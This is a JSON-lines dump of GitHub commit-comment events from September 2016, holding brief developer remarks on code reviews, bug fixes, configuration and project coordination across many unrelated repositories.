{"id":"4578449172","type":"CommitCommentEvent","actor":{"login":"hy-zhang"},"repo":{"name":"hy-zhang/parser"},"payload":{"comment":{"id":19066142,"position":null,"line":null,"path":null,"commit_id":"354fc580645b405a7142dd8947e4e7ddb1342c36","created_at":"2016-09-17T18:46:15Z","updated_at":"2016-09-17T18:46:15Z","body":"This commit gives the example of composing the first two languages Arith and Untyped. Finally it works well while keeping lexers, parser list and all parsers extensible. Furthermore, scala provides ||| as a parser combinator for alternative but \"with longest match composition\", which means parsers can be unordered for users I guess. For now it seems quite powerful, but not sure if it works well with larger examples or is heavy to use. And the idea of Grammar datatype can still be potentially used for pre-processing. "}},"created_at":"2016-09-17T18:46:15Z"}
{"id":"4578450322","type":"CommitCommentEvent","actor":{"login":"bigdogmat"},"repo":{"name":"Rusketh/ExpAdv2"},"payload":{"comment":{"id":19066153,"position":null,"line":null,"path":null,"commit_id":"bba095961f5374263deaca9195b9c9543d9db069","created_at":"2016-09-17T18:46:56Z","updated_at":"2016-09-17T18:46:56Z","body":"`hsv2rgb` was never broken, although now it is"}},"created_at":"2016-09-17T18:46:56Z"}
{"id":"4578450439","type":"CommitCommentEvent","actor":{"login":"MattDevo"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19066154,"position":null,"line":null,"path":null,"commit_id":"46f91ef3c1873f347dd8ccc6afd21202e8980dc1","created_at":"2016-09-17T18:47:02Z","updated_at":"2016-09-17T18:47:02Z","body":"To clarify, these config options enable the keyboard on Braswell Chromebooks (Acer R11, Lenovo N22, Acer CB 14) and the Elan touchscreen on the R11 (may be used by other models as well).  All other Chromebook keyboards were/are working without CONFIG_PINCTRL_CHERRYVIEW=y."}},"created_at":"2016-09-17T18:47:02Z"}
{"id":"4578451356","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19066164,"position":28,"line":28,"path":"reader-gtfs/src/test/java/com/graphhopper/GraphHopperGtfsIT.java","commit_id":"2993aba80735144d98d772041633b20f88a49fb8","created_at":"2016-09-17T18:47:30Z","updated_at":"2016-09-17T18:47:30Z","body":"okay that is from the demo (stop.txt -> North Ave / D Ave N)"}},"created_at":"2016-09-17T18:47:30Z"}
{"id":"4578454747","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19066175,"position":null,"line":null,"path":null,"commit_id":"10dc19eed42c710cac3362c7b9e64af545a16c46","created_at":"2016-09-17T18:49:35Z","updated_at":"2016-09-17T18:49:35Z","body":"eh ... that is one and the same, just with an additional var in there?\r\nwhat does this fix, what am I missing?"}},"created_at":"2016-09-17T18:49:35Z"}
{"id":"4578458850","type":"CommitCommentEvent","actor":{"login":"jakebrinkmann"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066187,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T18:51:56Z","updated_at":"2016-09-17T18:51:56Z","body":"I'm getting an absolute kick out reading the commit history, \"before fools didn't know how sick a chat app could be\", \"now they do\" :joy: :joy: :joy:"}},"created_at":"2016-09-17T18:51:56Z"}
{"id":"4578460254","type":"CommitCommentEvent","actor":{"login":"BlueNexus"},"repo":{"name":"JakeDaBoss/Prospector-2.1"},"payload":{"comment":{"id":19066197,"position":null,"line":null,"path":null,"commit_id":"6b428c98df0aeee729e8a19fb83de5de858c4b7d","created_at":"2016-09-17T18:52:52Z","updated_at":"2016-09-17T18:52:52Z","body":"This doesn't work as you think it does. It's quite buggy, and won't refill air across z-levels."}},"created_at":"2016-09-17T18:52:52Z"}
{"id":"4578462947","type":"CommitCommentEvent","actor":{"login":"IBPX"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19066208,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-17T18:54:31Z","updated_at":"2016-09-17T18:54:31Z","body":"@ObaniGemini I'm not sure I get what you mean. I'm saying that I think it's a bit of feature creep to have a music player."}},"created_at":"2016-09-17T18:54:31Z"}
{"id":"4578463247","type":"CommitCommentEvent","actor":{"login":"dcliftreaves"},"repo":{"name":"peplin/pygatt"},"payload":{"comment":{"id":19066211,"position":null,"line":null,"path":null,"commit_id":"b46b0c6cfda3708e7cd02017a7aae31cd966a083","created_at":"2016-09-17T18:54:43Z","updated_at":"2016-09-17T18:54:43Z","body":"Ah, this is not what I thought you wanted de-duplicated. I see now. "}},"created_at":"2016-09-17T18:54:43Z"}
{"id":"4578464498","type":"CommitCommentEvent","actor":{"login":"StormWulf"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19066214,"position":null,"line":null,"path":null,"commit_id":"10dc19eed42c710cac3362c7b9e64af545a16c46","created_at":"2016-09-17T18:55:33Z","updated_at":"2016-09-17T18:55:33Z","body":"The second effect wasn't working at all, so our team at Salvation fixed it"}},"created_at":"2016-09-17T18:55:33Z"}
{"id":"4578466035","type":"CommitCommentEvent","actor":{"login":"corny"},"repo":{"name":"hnakamur/go-sshd"},"payload":{"comment":{"id":19066219,"position":40,"line":87,"path":"server.go","commit_id":"fd0ed5dd58e3379905116cd551b21b98124cafb7","created_at":"2016-09-17T18:56:34Z","updated_at":"2016-09-17T18:56:34Z","body":"The mutex is useless because reading/writing a boolean is always atomic."}},"created_at":"2016-09-17T18:56:34Z"}
{"id":"4578468740","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19066229,"position":null,"line":null,"path":null,"commit_id":"f9360496579455f8a17ffd95adf780ef19bb7801","created_at":"2016-09-17T18:58:17Z","updated_at":"2016-09-17T18:58:17Z","body":"Yes, will make and merge PR on Monday. Just wanted to squash some other commits for PT-2782 together before merging in"}},"created_at":"2016-09-17T18:58:17Z"}
{"id":"4578469720","type":"CommitCommentEvent","actor":{"login":"gizmo98"},"repo":{"name":"RetroPie/SDL-mirror"},"payload":{"comment":{"id":19066231,"position":null,"line":null,"path":null,"commit_id":"57fc057a74168974d7db52e6c8ae4bee9b764930","created_at":"2016-09-17T18:58:54Z","updated_at":"2016-09-17T18:58:54Z","body":"@joolswills could you add a branch for x86 platforms? I need a branch without raspberry pi debian rules where i can put our patches."}},"created_at":"2016-09-17T18:58:54Z"}
{"id":"4578470221","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19066233,"position":41,"line":1531,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"41697da926f5c57fda16bc00055cc1a07d50064a","created_at":"2016-09-17T18:59:13Z","updated_at":"2016-09-17T18:59:13Z","body":"I still feel like unnecessarily forcing a \"\" is not nice. It's just hiding the potential for mistakes. Like some code trying to delete file \"\". Or \" \".\r\n\r\nNull is clear -- there's no file to delete."}},"created_at":"2016-09-17T18:59:13Z"}
{"id":"4578476867","type":"CommitCommentEvent","actor":{"login":"DunstleOS"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19066250,"position":null,"line":null,"path":null,"commit_id":"3f93339e837f953a1f985d2cd9a8af45beb28412","created_at":"2016-09-17T19:02:40Z","updated_at":"2016-09-17T19:02:40Z","body":"@picesszaza ใส่ไอดีพาสให้มันก่อน อะไรก็ได้\r\nusername 0000\r\npassword 0000"}},"created_at":"2016-09-17T19:02:40Z"}
{"id":"4578477323","type":"CommitCommentEvent","actor":{"login":"swangboy55"},"repo":{"name":"swangboy55/3DEngine"},"payload":{"comment":{"id":19066253,"position":null,"line":null,"path":null,"commit_id":"3513799cb600aa107c693e56383b619092fe4ce6","created_at":"2016-09-17T19:02:57Z","updated_at":"2016-09-17T19:02:57Z","body":"this is an odd place to ask, but could you type out your skype acc name, I couldn't find it."}},"created_at":"2016-09-17T19:02:57Z"}
{"id":"4578478083","type":"CommitCommentEvent","actor":{"login":"marun"},"repo":{"name":"marun/origin"},"payload":{"comment":{"id":19066254,"position":4,"line":75,"path":"test/cmd/admin.sh","commit_id":"148de23ea2826d4e260e4bad33e041564b32463e","created_at":"2016-09-17T19:03:29Z","updated_at":"2016-09-17T19:03:29Z","body":"As per the bug report, 'SchedulingDisabled' should appear in the output.  These tests are a bit lazy in what they're checking for, maybe it makes sense to check for 'SchedulingDisabled' instead of 'Sched'.  I don't think this bug justifies writing the fixture required to validate at a lower level, though it certainly would have made sense to do so instead of this shell scripting."}},"created_at":"2016-09-17T19:03:29Z"}
{"id":"4578482295","type":"CommitCommentEvent","actor":{"login":"picesszaza"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19066265,"position":null,"line":null,"path":null,"commit_id":"3f93339e837f953a1f985d2cd9a8af45beb28412","created_at":"2016-09-17T19:06:11Z","updated_at":"2016-09-17T19:06:11Z","body":"@DunstleOS ใส่อยู่ครับผมเดียวผมเทสอีกทีครับ ให้ช่วยเทสยังไงแจ้งได้เลยนะครับ"}},"created_at":"2016-09-17T19:06:11Z"}
{"id":"4578482425","type":"CommitCommentEvent","actor":{"login":"kmiloarguello"},"repo":{"name":"kmiloarguello/testbext"},"payload":{"comment":{"id":19066266,"position":19,"line":17,"path":"css/ipad_landscape.css","commit_id":"939ee791918f6e76a12779bcd030b08f129f3059","created_at":"2016-09-17T19:06:18Z","updated_at":"2016-09-17T19:06:18Z","body":"No olvidar volver a blanco\r\n`background-color: #fff;`"}},"created_at":"2016-09-17T19:06:18Z"}
{"id":"4578483423","type":"CommitCommentEvent","actor":{"login":"blackhole12"},"repo":{"name":"canterlotnightclub/canterlotnightclub.github.io"},"payload":{"comment":{"id":19066270,"position":null,"line":null,"path":null,"commit_id":"cfcfe8c9622bc18c1836a2a9533d04acea30c0fc","created_at":"2016-09-17T19:06:59Z","updated_at":"2016-09-17T19:06:59Z","body":"wow fucking seriously"}},"created_at":"2016-09-17T19:06:59Z"}
{"id":"4578484898","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19066272,"position":null,"line":null,"path":null,"commit_id":"c207012123dd8c468f28a789745fe25aee16cd6a","created_at":"2016-09-17T19:07:54Z","updated_at":"2016-09-17T19:07:54Z","body":"Also see [Issue 277: Cut-over to CRYPTOPP_ASSERT due to CVE-2016-7420](http://github.com/weidai11/cryptopp/issues/277)."}},"created_at":"2016-09-17T19:07:54Z"}
{"id":"4578485819","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19066275,"position":null,"line":null,"path":null,"commit_id":"10dc19eed42c710cac3362c7b9e64af545a16c46","created_at":"2016-09-17T19:08:32Z","updated_at":"2016-09-17T19:08:32Z","body":"if so I'd take a look at ulti-cannahawk as well, that part you edited was a direct copy and paste from that thing and that works perfectly fine\r\nand if your version works there is 0 reason for the previous one to not work ... if you look at it, that does the same thing ... I'd really like an explanation why mine doesn't work and yours does, because I don't get it?"}},"created_at":"2016-09-17T19:08:32Z"}
{"id":"4578486059","type":"CommitCommentEvent","actor":{"login":"Febrero"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":19066277,"position":null,"line":null,"path":null,"commit_id":"5745ef579edfecd02686c6155ba10ba7c578a654","created_at":"2016-09-17T19:08:43Z","updated_at":"2016-09-17T19:08:43Z","body":"Hi @pilamb \r\n\r\nI have seen a change in base.html to move <script> tags down, after </html> tag.\r\nBut I think that the async/defer solution is better, as you can see here:\r\nhttp://stackoverflow.com/questions/436411/where-is-the-best-place-to-put-script-tags-in-html-markup\r\n\r\nWhat do you think?\r\n"}},"created_at":"2016-09-17T19:08:43Z"}
{"id":"4578486355","type":"CommitCommentEvent","actor":{"login":"pvlakshmi"},"repo":{"name":"pvlakshmi/ProgrammingAssignment2"},"payload":{"comment":{"id":19066280,"position":null,"line":null,"path":null,"commit_id":"828a5821c42c3f2f5d6aa0841f41a03ce6812365","created_at":"2016-09-17T19:08:54Z","updated_at":"2016-09-17T19:08:54Z","body":"final"}},"created_at":"2016-09-17T19:08:54Z"}
{"id":"4578487304","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":19066282,"position":null,"line":null,"path":null,"commit_id":"b74e71f15d4a3993adff6dfb90f6a4043a1b20eb","created_at":"2016-09-17T19:09:34Z","updated_at":"2016-09-17T19:09:34Z","body":"现在只有入口舱盖的disable提示，出口舱盖的disable提示也应该加上吧"}},"created_at":"2016-09-17T19:09:34Z"}
{"id":"4578487684","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19066285,"position":null,"line":null,"path":null,"commit_id":"674c653772a10e774e8925f60191e04eaf6419ab","created_at":"2016-09-17T19:09:51Z","updated_at":"2016-09-17T19:09:51Z","body":"już wiem w czym był problem :)\r\n"}},"created_at":"2016-09-17T19:09:51Z"}
{"id":"4578487687","type":"CommitCommentEvent","actor":{"login":"jakebrinkmann"},"repo":{"name":"jakebrinkmann/emergent-planner"},"payload":{"comment":{"id":19066286,"position":null,"line":null,"path":null,"commit_id":"f8c46a8d373187c2c073a90fbbd57e9513327601","created_at":"2016-09-17T19:09:51Z","updated_at":"2016-09-17T19:09:51Z","body":"BTW, I saw this project, and it seems to have potential for inspiration/ideas: [Camlistore](https://camlistore.org/)"}},"created_at":"2016-09-17T19:09:51Z"}
{"id":"4578489267","type":"CommitCommentEvent","actor":{"login":"kmiloarguello"},"repo":{"name":"kmiloarguello/testbext"},"payload":{"comment":{"id":19066289,"position":null,"line":null,"path":null,"commit_id":"939ee791918f6e76a12779bcd030b08f129f3059","created_at":"2016-09-17T19:10:46Z","updated_at":"2016-09-17T19:10:46Z","body":"Falta cambiar el nombre a los id y clases para evitar confusiones en el futuro, y luego el sitio estará listo para añadirle interacción y contenido.\r\nNo hay issues hasta ahora que puedan afectar los procesos siguientes"}},"created_at":"2016-09-17T19:10:46Z"}
{"id":"4578495980","type":"CommitCommentEvent","actor":{"login":"emanuele45"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19066308,"position":5,"line":2480,"path":"install/install_1-1.php","commit_id":"f5e15207eb355fccbe6d9fe62222368c73933342","created_at":"2016-09-17T19:14:58Z","updated_at":"2016-09-17T19:14:58Z","body":"github sent the notification with a \"different\" subject and it went to another folder so I lost it until now...\r\nI feel you are right...\r\n\r\n/me goes revert change the commit."}},"created_at":"2016-09-17T19:14:58Z"}
{"id":"4578498033","type":"CommitCommentEvent","actor":{"login":"emanuele45"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19066316,"position":5,"line":2480,"path":"install/install_1-1.php","commit_id":"f5e15207eb355fccbe6d9fe62222368c73933342","created_at":"2016-09-17T19:16:12Z","updated_at":"2016-09-17T19:16:12Z","body":"Or... would it make sense to have it on by default on https?"}},"created_at":"2016-09-17T19:16:12Z"}
{"id":"4578500413","type":"CommitCommentEvent","actor":{"login":"Sixday500"},"repo":{"name":"AutodataGroup/API-code-samples"},"payload":{"comment":{"id":19066326,"position":9,"line":2,"path":"README.md","commit_id":"063bfd896f2a699fc48a7d3caf6033eb558bd87a","created_at":"2016-09-17T19:17:42Z","updated_at":"2016-09-17T19:17:42Z","body":"[ Alt tag ] (https://github.com/AutodataGroup/API-code-samples/blob/master/Images/autodata_logo_poweredby.jpg)\r\n"}},"created_at":"2016-09-17T19:17:42Z"}
{"id":"4578500732","type":"CommitCommentEvent","actor":{"login":"archfan"},"repo":{"name":"archfan/infinality_bundle"},"payload":{"comment":{"id":19066328,"position":null,"line":null,"path":null,"commit_id":"acb83b884f46b4c54a5529376592739f929e0fbe","created_at":"2016-09-17T19:17:54Z","updated_at":"2016-09-17T19:17:54Z","body":"Aw that's good to hear. You're welcome. :)\n\n\nOn 09/17/2016 11:17 AM, Sarfaraz Ahmad wrote:\n> A gazillion thanks for this work ! This repository works better for me than bohoomil's. Amazing font rendering with this repo !\n>\n\n"}},"created_at":"2016-09-17T19:17:54Z"}
{"id":"4578500968","type":"CommitCommentEvent","actor":{"login":"MareoRaft"},"repo":{"name":"ghseeli/grad-school-notes"},"payload":{"comment":{"id":19066329,"position":null,"line":null,"path":null,"commit_id":"183282ab1b26b0b23e6383e8b9908ed42a40929b","created_at":"2016-09-17T19:17:59Z","updated_at":"2016-09-17T19:17:59Z","body":"That's consistent, except that it says \\phi_a *inverse* in the notes, and plain old \\phi_a in your comment here."}},"created_at":"2016-09-17T19:17:59Z"}
{"id":"4578503688","type":"CommitCommentEvent","actor":{"login":"gaa-cifasis"},"repo":{"name":"NineFX/QuickFuzz"},"payload":{"comment":{"id":19066337,"position":null,"line":null,"path":null,"commit_id":"4dd7ba4c62e8adbf807f3aeaa07a6678f3b5803d","created_at":"2016-09-17T19:19:12Z","updated_at":"2016-09-17T19:19:12Z","body":"Keep in mind that Python.hs contains mostly generated code from Megadeth, and it will be deleted soon!"}},"created_at":"2016-09-17T19:19:12Z"}
{"id":"4578506271","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"NicoFarruggia/startup"},"payload":{"comment":{"id":19066346,"position":1,"line":1,"path":"00-HTML-CSS-basics/CSS/style.css","commit_id":"b9c64cdb42d996b1cb146a9d540e601d45462268","created_at":"2016-09-17T19:20:24Z","updated_at":"2016-09-17T19:20:24Z","body":"Great job! Just take in account that you could accomplish the same result using class selectors instead of tag selectors."}},"created_at":"2016-09-17T19:20:24Z"}
{"id":"4578506953","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19066348,"position":null,"line":null,"path":null,"commit_id":"f3691566b762f7d9848311521f747c9e0f4856d8","created_at":"2016-09-17T19:20:43Z","updated_at":"2016-09-17T19:20:43Z","body":"And what I myself join the party? (With or without check?) :-) \r\nGood luck!"}},"created_at":"2016-09-17T19:20:43Z"}
{"id":"4578508213","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19066351,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-17T19:21:19Z","updated_at":"2016-09-17T19:21:19Z","body":"Tyler I like what you did in the test.py and we could use some of it, I\njust put everything in client.py and server.py so everyone can see it and\nwe can be working on the same copy.\nI want to leave  test.py in there for reference.\nWe do need to figure out how to keep track of each ship and when it is sunk.\n\nDavid\n\nOn Sat, Sep 17, 2016 at 12:18 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> My last email I said server when it has a mix of server an client stuff. I\n> meant to say client side but the server side will have the read_board()\n> update_board() and return messages. (reading the lab assignment can help\n> clarify my explanation if I mis-spoke on client vs server side)The data\n> sent between server and client will probably be read in as a string which\n> can easily be cast to whatever we need. If we have to it would not be\n> difficult to change it to a char, byte, or even a bit. I am working on the\n> client side a little now just setting up a beginning structure. I didn't\n> want anyone to get too far then try to add a main() method and worry about\n> the proper indentation to keep python happy. If you have not struggled with\n> it like I did a long time ago python uses indentation for the blocks of\n> code instead of curly braces and the indentation is 4 spaces, some windows\n> machines will have tab set at 5 and it fucks everything up. So be sure\n> indentations for blocks of code are 4 spaces. I am making a main method for\n> each class and to make it easier we should make methods for read_board(),\n> update_board(), etc Python does not use bumpy case or camel case but I\n> don't really care what we use, python it is just convention and not a rule\n> to name the main method with a capitol letter, all other methods and\n> variables are lower_case_with_underscores.(in case you were wondering\n> about my naming in the previous email)\n> I think a 2d array would be easier to maintain for the board and setting\n> it up could use two nested for loops, one for row, one for column and read\n> in the text file a char or line at a time. I am open to any suggestions.\n> Just a reminder when working with the remote git repo, be sure to do a\n> pull before you start editing code to be sure you have the latest copy and\n> be sure to push regularly so we all stay current.\n>\n> Thanks\n> David\n>\n> On Sat, Sep 17, 2016 at 7:31 AM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> I was thinking of having something modular(more methods) that could be\n>> modified easier and easier for multiple people to work on. Server side\n>> would have a main that  would start by reading the command line arguments,\n>> assigning arguments to variables, build board from incomming text file\n>> argument(board could be a 2d array), open network conneciton, then read the\n>> board at x,y coords and return message. read_boardd(x,y){ return hit, miss,\n>> sink, repeat} hit miss sink repeat could be a string a char a bit, doesn't\n>> really matter. update_board(x,y){record shot on board at x,y)\n>> return_message(message){send http reply to client} There could be a\n>> variable named message, message = read_board(x,y) return_message(message){\n>> if message = hit return proper http reply if message = miss return proper\n>> http reply, if message...} The http replies could be separate methods too.\n>> Someone could work on building the 2d array from the text file. Someone\n>> could work on read_board() and update_board(). Someone could work on return\n>> message and http stuff. Once we get going people ca fill in where help is\n>> needed. I don't mind what part I work on, I thought I could start on the\n>> htttp and network stuff.\n>> What do you guys want to work on?  I will start on something an change or\n>> keep working on it once I hear back.\n>>\n>> David\n>>\n>> On Fri, Sep 16, 2016 at 7:13 PM, tyler-sassaman <notifications@github.com\n>> > wrote:\n>>\n>>> I uploaded a file with some chunks of code that are a start at a few\n>>> things, I am just not sure how to interface them with the rest of the\n>>> program. I think the easiest way to process a message is to parse the\n>>> message and call process with only the x and y values. How this would be\n>>> done I am not sure. I think a 2d array is the easiest way to maintain the\n>>> board and issue responses, and for each board query we can just create a\n>>> new board.txt file from the array.\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19062282>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AE8DG3Wt-M3m5PLng_3G-UL1D-aUKImWks5qqz6_gaJpZM4J_dYG>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-17T19:21:19Z"}
{"id":"4578509208","type":"CommitCommentEvent","actor":{"login":"paulofelipefeitosa"},"repo":{"name":"paulofelipefeitosa/Greedy"},"payload":{"comment":{"id":19066353,"position":null,"line":null,"path":null,"commit_id":"9d10e1817d132f9a017b6b66354a715bfa441c65","created_at":"2016-09-17T19:21:49Z","updated_at":"2016-09-17T19:21:49Z","body":"ACM ICPC Brazil First Phase 2016 - I"}},"created_at":"2016-09-17T19:21:49Z"}
{"id":"4578514462","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19066361,"position":16,"line":16,"path":"bounce/bounce.py","commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-17T19:24:21Z","updated_at":"2016-09-17T19:24:21Z","body":"If you look at the documentation for the random module (https://docs.python.org/3/library/random.html), I bet you can find a much easier way to do this!"}},"created_at":"2016-09-17T19:24:21Z"}
{"id":"4578514572","type":"CommitCommentEvent","actor":{"login":"ericduck40"},"repo":{"name":"ericduck40/mr.duck-"},"payload":{"comment":{"id":19066362,"position":null,"line":null,"path":null,"commit_id":"0301d1e218f20e3dd10fae42a4fc65545d7221a1","created_at":"2016-09-17T19:24:24Z","updated_at":"2016-09-17T19:24:24Z","body":"gitignore\r\n@@ -0,0 +1,19 @@\r\n +# Build and Release Folders\r\n +bin/\r\n +bin-debug/\r\n +bin-release/\r\n +[Oo]bj/ # FlashDevelop obj\r\n +[Bb]in/ # FlashDevelop bin\r\n +\r\n +# Other files and folders\r\n +.settings/\r\n +\r\n +# Executables\r\n +*.swf\r\n +*.air\r\n +*.ipa\r\n +*.apk\r\n +\r\n +# Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties`\r\n +# should NOT be excluded as they contain compiler settings and other important\r\n +# information for Eclipse / Flash Builder."}},"created_at":"2016-09-17T19:24:24Z"}
{"id":"4578515847","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19066366,"position":null,"line":null,"path":null,"commit_id":"674c653772a10e774e8925f60191e04eaf6419ab","created_at":"2016-09-17T19:25:02Z","updated_at":"2016-09-17T19:25:02Z","body":"po małych zawirowaniach udało mi się usunąć te pliki (zamieściłam je w pliku .gitignore)"}},"created_at":"2016-09-17T19:25:02Z"}
{"id":"4578517027","type":"CommitCommentEvent","actor":{"login":"slimsag"},"repo":{"name":"shurcooL/Go-Package-Store"},"payload":{"comment":{"id":19066368,"position":null,"line":null,"path":null,"commit_id":"2e0d1eeea888947f677fc9092434b2bceea4b61d","created_at":"2016-09-17T19:25:38Z","updated_at":"2016-09-17T19:25:38Z","body":"@shurcooL I'm not aware of anyone outside Azul3D using the semver package, and we moved off of it when we migrated everything to `azul3d.org/engine` (unversioned import paths), so I think that there is a good likelyhood that G-P-S does not need to worry about versioned azul3d import paths at all anymore. Maybe just remove support for it entirely?\r\n\r\nIf not, the SSL certificate issue has been resolved and `go get` should always be able to fetch the package now. Vendoring is also okay."}},"created_at":"2016-09-17T19:25:38Z"}
{"id":"4578517586","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19066370,"position":null,"line":null,"path":null,"commit_id":"4850644ec9f6aeb59ba6367cefced9b7393ae313","created_at":"2016-09-17T19:25:56Z","updated_at":"2016-09-17T19:25:56Z","body":"Nice work, man!"}},"created_at":"2016-09-17T19:25:56Z"}
{"id":"4578517751","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19066372,"position":35,"line":35,"path":"bounce/bounce.py","commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-17T19:26:01Z","updated_at":"2016-09-17T19:26:01Z","body":"Why do you change the X-direction velocity that you picked during the __init__ method?"}},"created_at":"2016-09-17T19:26:01Z"}
{"id":"4578518122","type":"CommitCommentEvent","actor":{"login":"Sierracode"},"repo":{"name":"Sierracode/-tg-station"},"payload":{"comment":{"id":19066373,"position":null,"line":null,"path":null,"commit_id":"58d117120dd199a45b0866b250d15d49cec3ce1c","created_at":"2016-09-17T19:26:12Z","updated_at":"2016-09-17T19:26:12Z","body":"Solars have already been fixedTM please separate and I shall push the safe PR\r\n"}},"created_at":"2016-09-17T19:26:12Z"}
{"id":"4578519426","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19066382,"position":25,"line":25,"path":"bounce/bounce.py","commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-17T19:26:51Z","updated_at":"2016-09-17T19:26:51Z","body":"Can you find a way to make this code easier to understand?  What is `pos[0]` or `pos[1]`?  What do they mean?"}},"created_at":"2016-09-17T19:26:51Z"}
{"id":"4578520064","type":"CommitCommentEvent","actor":{"login":"cl0ne"},"repo":{"name":"AlexBoliachiy/register"},"payload":{"comment":{"id":19066388,"position":37,"line":174,"path":"untitled5/views.py","commit_id":"d5f3bc9070d4492aa36137483aadcf0a786927c1","created_at":"2016-09-17T19:27:19Z","updated_at":"2016-09-17T19:27:19Z","body":"use [urls.reverse](https://docs.djangoproject.com/en/1.10/ref/urlresolvers/#django.urls.reverse) and don't assemble urls by hand.\r\n[Django tutorials](https://docs.djangoproject.com/en/1.10/intro/tutorial04/) are worth time spent on them."}},"created_at":"2016-09-17T19:27:19Z"}
{"id":"4578520377","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19066389,"position":null,"line":null,"path":null,"commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-17T19:27:32Z","updated_at":"2016-09-17T19:27:32Z","body":"This looks pretty good -- and it plays pretty well.  It's hard!\r\n\r\nI look forward to getting your solutions for the programming puzzles!"}},"created_at":"2016-09-17T19:27:32Z"}
{"id":"4578522680","type":"CommitCommentEvent","actor":{"login":"paddor"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19066398,"position":18,"line":18,"path":"examples/C/pathosub.c","commit_id":"6868ee254fa49bd0afe40ace10e9388a87f68c59","created_at":"2016-09-17T19:29:06Z","updated_at":"2016-09-17T19:29:06Z","body":"I'm wondering, what happens to the remaining 2 bytes in the `subscription` char array? Isn't that garbage and stays garbage because `sprintf` only prints 3 characters?"}},"created_at":"2016-09-17T19:29:06Z"}
{"id":"4578523788","type":"CommitCommentEvent","actor":{"login":"iArnold"},"repo":{"name":"qtxie/red"},"payload":{"comment":{"id":19066407,"position":null,"line":null,"path":null,"commit_id":"ab923de5aa5f1a550f1de839866bc5ed4b8b73ce","created_at":"2016-09-17T19:29:52Z","updated_at":"2016-09-17T19:29:52Z","body":"That did the trick! Thanks again!"}},"created_at":"2016-09-17T19:29:52Z"}
{"id":"4578524065","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19066409,"position":null,"line":null,"path":null,"commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-17T19:30:04Z","updated_at":"2016-09-17T19:30:04Z","body":"@alfaproject No.\r\n\r\nAs specified in the part 2 of the DLNA standard.\r\n> Maximum resolution\r\n> the resolution of the image shall not exceed 640 pixels in the ImageWidth field and shall not exceed \r\n> 480 pixels in the ImageHeight field;"}},"created_at":"2016-09-17T19:30:04Z"}
